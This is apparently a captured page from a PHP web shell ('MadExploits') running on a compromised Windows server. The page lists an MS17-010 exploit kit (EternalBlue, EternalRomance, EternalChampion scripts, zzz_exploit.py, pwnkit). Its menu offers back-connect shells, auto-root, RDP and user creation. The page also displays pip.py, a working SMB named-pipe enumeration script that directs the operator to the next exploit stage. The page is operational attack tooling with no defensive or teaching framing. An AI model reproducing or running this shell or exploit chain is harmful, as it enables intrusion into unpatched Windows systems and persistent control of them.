Windows NT SRV-DATA 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
: 192.168.213.201 | : 216.73.216.102
Cant Read [ /etc/named.conf ]
8.2.0
ADMINISTRATEUR
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ E ]
[ Z ]
C: /
Users /
admin /
Desktop /
MS17-010-master /
[ HOME SHELL ]
Name
Size
Permission
Action
shellcode
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
BUG.txt
27.13
KB
-rw-rw-rw-
Nouveau document texte.txt
0
B
-rw-rw-rw-
README.md
3.29
KB
-rw-rw-rw-
checker.py
2.44
KB
-rw-rw-rw-
eternalblue_exploit7.py
25.12
KB
-rw-rw-rw-
eternalblue_exploit8.py
23.51
KB
-rw-rw-rw-
eternalblue_poc.py
3.71
KB
-rw-rw-rw-
eternalchampion_leak.py
1.51
KB
-rw-rw-rw-
eternalchampion_poc.py
2.53
KB
-rw-rw-rw-
eternalchampion_poc2.py
5.8
KB
-rw-rw-rw-
eternalromance_leak.py
1.61
KB
-rw-rw-rw-
eternalromance_poc.py
948
B
-rw-rw-rw-
eternalromance_poc2.py
4.99
KB
-rw-rw-rw-
eternalsynergy_leak.py
1.82
KB
-rw-rw-rw-
eternalsynergy_poc.py
2.95
KB
-rw-rw-rw-
infoleak_uninit.py
1.08
KB
-rw-rw-rw-
mysmb.py
16.28
KB
-rw-rw-rw-
mysmb.pyc
16.68
KB
-rw-rw-rw-
npp_control.py
1.8
KB
-rw-rw-rw-
pip.py
2.98
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
python
0
B
-rw-rw-rw-
smbold.py
41
KB
-rw-rw-rw-
win7.py
26.09
KB
-rw-rw-rw-
zzz_exploit.py
42.4
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pip.py
#!/usr/bin/python # check_pipes.py - enumerate accessible named pipes on an SMB target # Usage: # python check_pipes.py <ip> # python check_pipes.py <ip> <username> <password> # python check_pipes.py <ip> <username> <password> <domain> import sys import socket from mysmb import MYSMB PIPES = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr', 'srvsvc', 'wkssvc', 'atsvc', 'epmapper', 'eventlog', 'InitShutdown', 'keysvc', 'ntsvcs', 'scerpc', 'plugplay', 'protected_storage', 'trkwks', 'W32TIME', 'DAV RPC SERVICE', 'MsFteWds', 'Search', 'PIPE_EVENTROOT\\CIMV2SCM EVENT PROVIDER', ] def main(): if len(sys.argv) < 2: print("Usage: {} <ip> [username] [password] [domain]".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] username = sys.argv[2] if len(sys.argv) > 2 else '' password = sys.argv[3] if len(sys.argv) > 3 else '' domain = sys.argv[4] if len(sys.argv) > 4 else '' print("[*] Target : {}".format(target)) print("[*] User : {!r}".format(username)) print("[*] Domain : {!r}".format(domain)) print("[*] Password: {!r}".format('*' * len(password))) print() conn = MYSMB(target) conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) try: conn.login(username, password, domain, maxBufferSize=4356) except Exception as e: print("[-] Login failed: {}".format(e)) sys.exit(1) try: server_os = conn.get_server_os() print("[+] Server OS: {}".format(server_os)) except Exception: print("[!] Could not read server OS") print() try: tid = conn.tree_connect_andx('\\\\' + target + '\\IPC$') except Exception as e: print("[-] Could not connect to IPC$: {}".format(e)) sys.exit(1) print("[*] Probing named pipes on \\\\{}\\IPC$".format(target)) print("-" * 60) opened = [] denied = [] for pipe in PIPES: try: fid = conn.nt_create_andx(tid, pipe) print("[+] OPEN {:<40} fid=0x{:x}".format(pipe, fid)) opened.append(pipe) try: conn.close(tid, fid) except Exception: pass except Exception as e: msg = str(e).split('\n')[0] print("[-] DENY {:<40} ({})".format(pipe, msg)) denied.append(pipe) print("-" * 60) print("[*] Summary: {} open, {} denied".format(len(opened), len(denied))) if opened: print("[*] Use one of these with smbold.py:") for p in opened: print(" python smbold.py {} {}".format(target, p)) else: print("[!] No accessible pipes with the supplied credentials.") print("[!] Try eternalblue_exploit7.py instead, which only needs IPC$.") try: conn.disconnect_tree(tid) conn.logoff() except Exception: pass if __name__ == '__main__': main()
Close